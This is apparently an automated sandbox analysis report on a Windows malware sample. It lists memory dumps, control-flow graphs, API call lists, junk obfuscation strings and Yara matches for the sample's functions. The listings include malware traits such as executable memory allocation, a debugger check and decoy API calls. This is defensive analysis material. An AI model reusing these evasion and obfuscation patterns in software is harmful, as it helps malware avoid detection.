                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: LibraryLoadProtectVirtual
                    • String ID: msimg32.dll
                    • API String ID: 3279857687-3287713914
                    • Opcode ID: 244c4e39fe4b2ccf6bc93950e309f3ae9ef2294554bba0a72f1c4a5b75af8682
                    • Instruction ID: 32103591575807172483443c4fe4fd919437326cba8f7a005f6dd069ed140a70
                    • Opcode Fuzzy Hash: 244c4e39fe4b2ccf6bc93950e309f3ae9ef2294554bba0a72f1c4a5b75af8682
                    • Instruction Fuzzy Hash: B111E8608492C0EFE35AC72CBD587813F919366704F084AF9D3844A3B3C3AA1958C73E
                    Function 021F05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 232 21f05b0-21f05d5 233 21f05dc-21f05e0 232->233 234 21f061e-21f0621 233->234 235 21f05e2-21f05f5 GetFileAttributesA 233->235 236 21f05f7-21f05fe 235->236 237 21f0613-21f061c 235->237 236->237 238 21f0600-21f060b call 21f0420 236->238 237->233 240 21f0610 238->240 240->237
                    APIs
                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 021F05EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID: apfHQ$o
                    • API String ID: 3188754299-2999369273
                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction ID: 2893700a4f57b992d8fe530671c0d8b26c65e1d4e3bc959c433129b6ec98f0bd
                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction Fuzzy Hash: 24012170C0425CEEDF54DB98C5183AEBFB5AF45308F1480D9C5192B242D7B69B59CBA1
                    Function 0040A860 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 254 40a860-40a86a call 4111f0 call 40a880 258 40a86f-40a870 254->258
                    APIs
                    • ___security_init_cookie.LIBCMTD ref: 0040A865
                      • Part of subcall function 0040A880: GetStartupInfoW.KERNEL32(?,3C0B72C1), ref: 0040A8C7
                      • Part of subcall function 0040A880: _check_managed_app.LIBCMTD ref: 0040A8FC
                      • Part of subcall function 0040A880: __heap_init.LIBCMTD ref: 0040A906
                      • Part of subcall function 0040A880: _fast_error_exit.LIBCMTD ref: 0040A914
                      • Part of subcall function 0040A880: __mtinit.LIBCMTD ref: 0040A91C
                      • Part of subcall function 0040A880: _fast_error_exit.LIBCMTD ref: 0040A927
                      • Part of subcall function 0040A880: __RTC_Initialize.LIBCMTD ref: 0040A939
                      • Part of subcall function 0040A880: ___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A962
                      • Part of subcall function 0040A880: ___wsetargv.LIBCMTD ref: 0040A96C
                      • Part of subcall function 0040A880: __wsetenvp.LIBCMTD ref: 0040A97F
                      • Part of subcall function 0040A880: __cinit.LIBCMTD ref: 0040A994
                      • Part of subcall function 0040A880: __wwincmdln.LIBCMTD ref: 0040A9B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _fast_error_exit$EnvironmentInfoInitializeStartupStrings___crt___security_init_cookie___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
                    • String ID:
                    • API String ID: 1121186130-0
                    • Opcode ID: f531b0b4c4615b780cca53589e0368a575a3c175001ff33ae6c18d0542cb96dd
                    • Instruction ID: 77ceb355168f4a2d50ef00ea5da8e4e715cd62e3c6def0b8664929e224abdccd
                    • Opcode Fuzzy Hash: f531b0b4c4615b780cca53589e0368a575a3c175001ff33ae6c18d0542cb96dd
                    • Instruction Fuzzy Hash: D9A0023304474D26466433E7240796AB75E48C47AD795427BFB1C165531C6DA8EA40AF
                    Function 02153485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 259 2153485-21534bf call 2153798 262 21534c1-21534f4 VirtualAlloc call 2153512 259->262 263 215350d 259->263 265 21534f9-215350b 262->265 263->263 265->263
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021534D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2153000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 5dffad6ee6b9ed4dedd68bcb20807601c3f087006dec8c2e951a6360618ba574
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 4C112879A40208EFDB01DF98C985E99BBF5AF08350F0580A4F9589B361D371EA90EF80
                    Function 004093D0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 269 4093d0-4093e3 GlobalAlloc
                    APIs
                    • GlobalAlloc.KERNELBASE(00000000,00091160,00409906), ref: 004093D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: AllocGlobal
                    • String ID:
                    • API String ID: 3761449716-0
                    • Opcode ID: 46fa67bb1b0205c180beed20f28752f2e48912fb6934a134fb5cf32996d4ae38
                    • Instruction ID: 9a31a9ad94ec612c2b5ea8e229665075761634853709963a7ee1bc639a95e544
                    • Opcode Fuzzy Hash: 46fa67bb1b0205c180beed20f28752f2e48912fb6934a134fb5cf32996d4ae38
                    • Instruction Fuzzy Hash: C0B092B01012489FD7408F60AE44B243A68E788312F008021B688892A1D7B014808A18

                    Non-executed Functions

                    Function 00409685 Relevance: 129.8, APIs: 58, Strings: 16, Instructions: 331timethreadfileCOMMON
                    Download Yara Rule
                    APIs
                    • _putc.LIBCMTD ref: 00409689
                      • Part of subcall function 0040A540: __errno.LIBCMTD ref: 0040A5AF
                      • Part of subcall function 0040A540: __invalid_parameter.LIBCMTD ref: 0040A5CD
                    • __wrename.LIBCMTD ref: 00409692
                      • Part of subcall function 0040A4F0: MoveFileA.KERNEL32(?,?), ref: 0040A4FE
                      • Part of subcall function 0040A4F0: GetLastError.KERNEL32 ref: 0040A508
                      • Part of subcall function 00409F40: _doexit.LIBCMTD ref: 00409F4D
                    • GetBinaryTypeW.KERNEL32(00000000,?), ref: 004096CF
                    • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004096DB
                    • BuildCommDCBAndTimeoutsW.KERNEL32(vomejuxozuvisuweviw,?,?), ref: 00409702
                    • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00409716
                    • WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00409733
                    • FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 00409742
                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 00409763
                    • GetNamedPipeHandleStateA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409777
                    • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00409781
                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00409789
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00409796
                    • OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 004097A2
                    • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004097AE
                    • CharUpperW.USER32(00000000), ref: 004097FA
                    • GetLastError.KERNEL32 ref: 004097FC
                    • EnumSystemLocalesA.KERNEL32(00000000,00000000), ref: 00409853
                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0040985B
                    • DebugBreak.KERNEL32 ref: 0040985D
                    • MoveFileWithProgressW.KERNEL32(nahipumoraxeyur,lulecaxitejewutubenopevinemezimevoxiv,00000000,00000000,00000000), ref: 00409873
                    • GetCommState.KERNEL32(00000000,00000000), ref: 00409879
                    • CreateMailslotW.KERNEL32(00000000,?,00000000,00000000), ref: 00409886
                    • WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00409897
                    • GetConsoleAliasExesLengthA.KERNEL32 ref: 0040989D
                    • SetComputerNameA.KERNEL32(tusidisipilujawudimu), ref: 004098A8
                    • GlobalGetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 004098B4
                    • AllocConsole.KERNEL32 ref: 004098BA
                    • CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 004098C8
                    • GetConsoleCP.KERNEL32 ref: 004098CE
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004098D6
                    • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004098E6
                    • SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0040991B
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409961
                    • ConvertFiberToThread.KERNEL32 ref: 00409970
                    • QueryDepthSList.KERNEL32(?), ref: 0040997F
                    • DeleteCriticalSection.KERNEL32(?), ref: 00409986
                    • GetThreadContext.KERNEL32(00000000,00000000), ref: 004099CE
                    • OpenMutexW.KERNEL32(00000000,00000000,jurayisotixaruyexarule), ref: 004099D7
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004099FE
                    • DebugBreak.KERNEL32 ref: 00409A04
                    • LoadLibraryA.KERNEL32(ludiwesexexayonex), ref: 00409A0F
                    • lstrlenA.KERNEL32(00000000), ref: 00409A16
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00409A1F
                    • FlushConsoleInputBuffer.KERNEL32(00000000), ref: 00409A26
                    • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 00409A2E
                    • SetEvent.KERNEL32(00000000), ref: 00409A35
                    • OutputDebugStringW.KERNEL32(00000000), ref: 00409A3C
                    • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00409A4E
                    • GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409A58
                    • CreateActCtxA.KERNEL32(?), ref: 00409A63
                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A6F
                    • GetOEMCP.KERNEL32 ref: 00409A75
                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00409A7E
                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00409A8A
                    • WaitForDebugEvent.KERNEL32(00000000,00000000), ref: 00409A92
                    • SetConsoleScreenBufferSize.KERNEL32(00000000,00000001), ref: 00409AAC
                    • GetConsoleAliasExesLengthA.KERNEL32 ref: 00409AB2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Console$File$Debug$AliasCreateExesInputLengthOpenOutputThreadWrite$BreakBufferCharacterCommEnumEnvironmentErrorEventFreeLastMoveNamePrivateProcessProfileSizeStateStringStringsSystem$AdjustmentAffinityAliasesAllocAtomBinaryBoostBuildCharCompletionComputerContextConvertCopyCriticalDeleteDepthExchangeFiberFillFindFlushFormatGlobalHandleInterlockedLibraryListLoadLocalesLockMailslotMappingMaskMountMutexNamedNextNumberParametersPipePointPortPriorityProgressQueryReadResourceScreenSectionShutdownTimeTimeoutsTimerTypeTypesUpperVolumeWaitWaitableWith__errno__invalid_parameter__wrename_doexit_putclstrlen
                    • String ID: 28B$jjj$jjj$jjj$jjj$jjj$jjjj$jjjj$jjjjj$jjjjjjj$jurayisotixaruyexarule$ludiwesexexayonex$lulecaxitejewutubenopevinemezimevoxiv$nahipumoraxeyur$tusidisipilujawudimu$vomejuxozuvisuweviw
                    • API String ID: 3842426426-3127187461
                    • Opcode ID: 8a90c11321ff2a47067b5ec547590b842b953b4d0688f9188d0bf975c6baacb0
                    • Instruction ID: 67afbd799b0d51422c515b961bfaae4b49cafdb176e38eed82a0a27c85cff67d
                    • Opcode Fuzzy Hash: 8a90c11321ff2a47067b5ec547590b842b953b4d0688f9188d0bf975c6baacb0
                    • Instruction Fuzzy Hash: 80B14171544304AFD314AFA0EE49F6B77A8EB8C715F104439F786BA2F2D67468408B6E
                    Function 00409030 Relevance: 22.6, APIs: 15, Instructions: 121filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • VerLanguageNameW.KERNEL32(00000000,?,00000000), ref: 0040904E
                    • SetDefaultCommConfigW.KERNEL32(00000000,00000000,00000000), ref: 00409059
                    • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 00409082
                    • BuildCommDCBW.KERNEL32(00000000,?), ref: 004090D5
                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004090E7
                    • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 004090F4
                    • FindNextFileA.KERNEL32(00000000,?,00000000,771ADFA0,771C2F80,771B3B10), ref: 00409110
                    • SetEvent.KERNEL32(00000000), ref: 00409118
                    • FreeResource.KERNEL32(00000000,00000000,771ADFA0,771C2F80,771B3B10), ref: 00409129
                    • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00409136
                    • GetVersionExA.KERNEL32(?), ref: 00409140
                    • SetLastError.KERNEL32(00000000), ref: 00409144
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040914A
                    • CreateTimerQueueTimer.KERNEL32 ref: 00409169
                    • FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,771ADFA0,771C2F80,771B3B10), ref: 004091A8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: File$CharacterCommConsoleOutputTimerVersion$BuildCompressedConfigCopyCreateDefaultErrorEventFillFindFreeInfoLanguageLastNameNextProcessQueueReadResourceSizeTerminateVerify
                    • String ID:
                    • API String ID: 2545875003-0
                    • Opcode ID: 4a51f737c9477594d9e5c9dfd417a6e806aa0caca2ea8e35e7fb9f895af45882
                    • Instruction ID: 71bc63c6daabab92dd0d732ebc29534d627e3417d993f9df0ceb4b19dfcac6d0
                    • Opcode Fuzzy Hash: 4a51f737c9477594d9e5c9dfd417a6e806aa0caca2ea8e35e7fb9f895af45882
                    • Instruction Fuzzy Hash: B4414271248340AFE310DB50DE45FAB77B8EFD8711F04482DF289A61E1D7B49944CB6A
                    Function 0220F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$_free_malloc_strstr$_wcsstr
                    • String ID: "
                    • API String ID: 430003804-123907689
                    • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                    • Instruction ID: 8c39c0fe6e5d73e95ad7b6dfbaae71663425901b874ccb1a93655d0faf1915f0
                    • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                    • Instruction Fuzzy Hash: C442E171458381ABD720DFA4CC88F9B7BE9BF85308F04092DF98987196DB74D509CBA2
                    Function 0220A930 Relevance: 10.3, APIs: 3, Strings: 2, Instructions: 1565COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: <$x2Q
                    • API String ID: 2102423945-643667464
                    • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                    • Instruction ID: eece9d9c538f8e0ac5b82b4d8f2413284407d0c9bb3422a875ed32f5274a309f
                    • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                    • Instruction Fuzzy Hash: 7AD2CE705243419BD724EFA0C8D4BAFBBE6BF94308F40492DE585872D6EB71A509CF92
                    Function 022000D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                    • Instruction ID: c77671b849ee27912a3f0fb7f0f23e13d4698ac2fca8171b37f33b3af2089ea0
                    • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                    • Instruction Fuzzy Hash: E3528D70D20219DBEF14DFE8C884BEEBBB5BF14308F108169D419A7295E775AA48CF91
                    Function 021FE6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                    Download Yara Rule
                    APIs
                    • _wcsstr.LIBCMT ref: 021FE72D
                    • _wcsstr.LIBCMT ref: 021FE756
                    • _memset.LIBCMT ref: 021FE784
                      • Part of subcall function 0223FC0C: std::exception::exception.LIBCMT ref: 0223FC1F
                      • Part of subcall function 0223FC0C: __CxxThrowException@8.LIBCMT ref: 0223FC34
                      • Part of subcall function 0223FC0C: std::exception::exception.LIBCMT ref: 0223FC4D
                      • Part of subcall function 0223FC0C: __CxxThrowException@8.LIBCMT ref: 0223FC62
                      • Part of subcall function 0223FC0C: std::regex_error::regex_error.LIBCPMT ref: 0223FC74
                      • Part of subcall function 0223FC0C: __CxxThrowException@8.LIBCMT ref: 0223FC82
                      • Part of subcall function 0223FC0C: std::exception::exception.LIBCMT ref: 0223FC9B
                      • Part of subcall function 0223FC0C: __CxxThrowException@8.LIBCMT ref: 0223FCB0
                    • _wcsstr.LIBCMT ref: 021FEA0C
                    • _memset.LIBCMT ref: 021FEE5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                    • String ID:
                    • API String ID: 1338678108-0
                    • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                    • Instruction ID: e925af7e7467d2abfc300c8cda64f4846a535b053427322a098b35f197f366e2
                    • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                    • Instruction Fuzzy Hash: BB52DF71A003199FCF68CFA8C894BAEBBF2BF04304F144569E966AB391D7319945CF91
                    Function 00414D00 Relevance: 7.6, APIs: 5, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0041AE9D
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041AEB4
                    • UnhandledExceptionFilter.KERNEL32(00406C28), ref: 0041AEBF
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041AEDD
                    • TerminateProcess.KERNEL32(00000000), ref: 0041AEE4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: e1e314255d7afd7030e217df31f3db01cd3cc19a839896e1e426081862a8923d
                    • Instruction ID: 4e27b25da12741501a0343e493a08648da73235f3b1e22f3a3a21c80d8e07bcf
                    • Opcode Fuzzy Hash: e1e314255d7afd7030e217df31f3db01cd3cc19a839896e1e426081862a8923d
                    • Instruction Fuzzy Hash: BA21D2B88013849BC381DF94FDC4A453BB4BB88315F1046BAE9689B362E7B465D1CF4D
                    Function 02200B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                    • Instruction ID: cd48d985004af709ee12ca9ba4d70839d3bab2d32ef8011316308be9a4d6ce85
                    • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                    • Instruction Fuzzy Hash: D8428C70D20218DBDB14DFE4C884BDEB7F6BF14308F204169D809A7295EB71AA59CFA1
                    Function 021FDBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                    • Instruction ID: e10500cdab8d10d622efa6963e9a6fd76ce123cc8887b8a463a1c3e9049cc959
                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                    • Instruction Fuzzy Hash: 95527570E40249DFDB50DFA4C848FEEBBB5BF49704F148198E615AB2A1DB31AE45CB90
                    Function 022722C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
